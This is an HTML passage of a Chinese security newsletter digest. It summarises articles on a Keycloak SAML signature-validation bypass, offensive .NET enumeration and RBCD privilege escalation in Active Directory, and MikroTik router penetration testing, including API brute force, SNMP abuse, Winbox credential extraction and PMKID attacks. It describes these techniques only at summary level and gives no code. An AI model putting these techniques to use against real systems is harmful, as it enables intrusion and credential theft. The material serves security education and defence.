	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Keycloak 的 SAML 签名验证漏洞可能导致严重的安全风险，包括权限提升和模拟攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">漏洞的根本原因在于 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">XMLSignatureUtil</code> 类中的 <code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">validate</code> 方法错误地实现了签名验证逻辑。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者可以通过精心设计的 XML 签名和断言操作来绕过验证。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">为了防御这种攻击，开发者应该确保使用最新版本的 Keycloak，并且在配置 SAML 时启用所有必要的安全验证。</section></li></ul>
	<br/>
	<p>🏷️: KeyCloak, SAML, 签名验证, 漏洞, XMLSignatureUtil</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x03
			 利用.NET框架枚举和攻击活动目录环境</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;"></span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.5478927203065134" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1044" src="https://wechat2rss.xlab.app/img-proxy/?k=93301aff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp66f0c3FhBc7FY5WwcxWbCHAWzrED2VlYR7RhlyL7aWpV28r7tjhCcNw%2F640%3Ffrom%3Dappmsg"/>
	</section></section>

	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">利用Offensive .NET枚举和利用Active Directory环境</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">.NET 攻击技巧：枚举和利用 Active Directory 环境</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6nMoMbuShMvgT7tcnyAG8CibRqptickq7akIXvo39w3FpmmBwJ2YM03Kg/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp6nMoMbuShMvgT7tcnyAG8CibRqptickq7akIXvo39w3FpmmBwJ2YM03Kg/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848581852245828"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">.NET Framework是进行Windows和Active Directory环境操作的理想选择，因为它不需要额外的依赖安装，能够原生运行，并且提供了丰富的类库和命名空间来简化开发。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">LDAP是Active Directory中最基础的协议之一，使用.NET进行LDAP枚举能够有效地收集用户、组和其他对象的信息。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">枚举Domain Controllers和Trusts是理解和横向移动在Active Directory环境中的关键步骤，利用.NET可以轻松实现这一点。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">RBCD攻击是一种高风险的权限提升方法，通过修改目标对象的特定属性，攻击者可以实现对资源的委托。</section></li></ul>
	<br/>
	<p>🏷️: .NET, 活动目录, 攻击, 枚举, 网络安全</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x04
			 针对MikroTik路由器的渗透测试研究</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">本文主要介绍了针对MikroTik路由器的渗透测试方法和技术，包括API服务的暴力破解、设备发现、SNMP协议的滥用、UPnP扫描、缺失的安全特性、Winbox凭证的提取、PMKID攻击、配置分析工具Sara的使用、内网渗透技术Pivoting以及RouterOS的后期利用策略。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.21296296296296297" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=d56e443c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6F928d1p8VicYnx2psnHHslESXpdSc4HRRADvxxdQMSoGaPzAchWReLA%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.39814814814814814" data-w="1080" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=46c72eb1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6Y4DBkvZCpXgNTu5OhX3BIqdnK7U9kHBAEqfdXdVABb5ibCWWmO3jGKg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.4172661870503597" data-w="973" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=e86e0276&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6KOtoaPYsiax99Hm8HNzcicx44QwpW1LCnAsdpklfjjIV4bHMLWBBEKLQ%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">渗透测试 MikroTik 路由器</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MikroTik 路由器渗透测试</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp62P5WicT0ho0JXTnDZXJQHS4cYAwY8tDGicEPGqDQlVibcqK7vdibaLsc7w/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmq9olbYbLBTq8AYY0qtCp62P5WicT0ho0JXTnDZXJQHS4cYAwY8tDGicEPGqDQlVibcqK7vdibaLsc7w/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=1525458411452412"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">MikroTik路由器的安全性至关重要：由于MikroTik路由器在全球范围内的广泛使用，它们的安全性对网络稳定性和保护至关重要。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">API服务的不当配置是安全风险：MikroTik设备的API服务如果未经配置或保护不当，可能会成为攻击者获取控制权限的入口点。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">网络发现和SNMP协议的滥用：攻击者可以利用网络发现协议和SNMP协议来收集关键的网络设备信息，这些信息可能会被用于进一步的攻击。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">缺乏安全特性增加了攻击面：缺少DAI、Storm Control和VACL等网络安全特性会增加网络面临的安全风险。</section></li></ul>
	<br/>
	<p>🏷️: 渗透测试, MikroTik, 路由器, 网络安全, 攻击</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
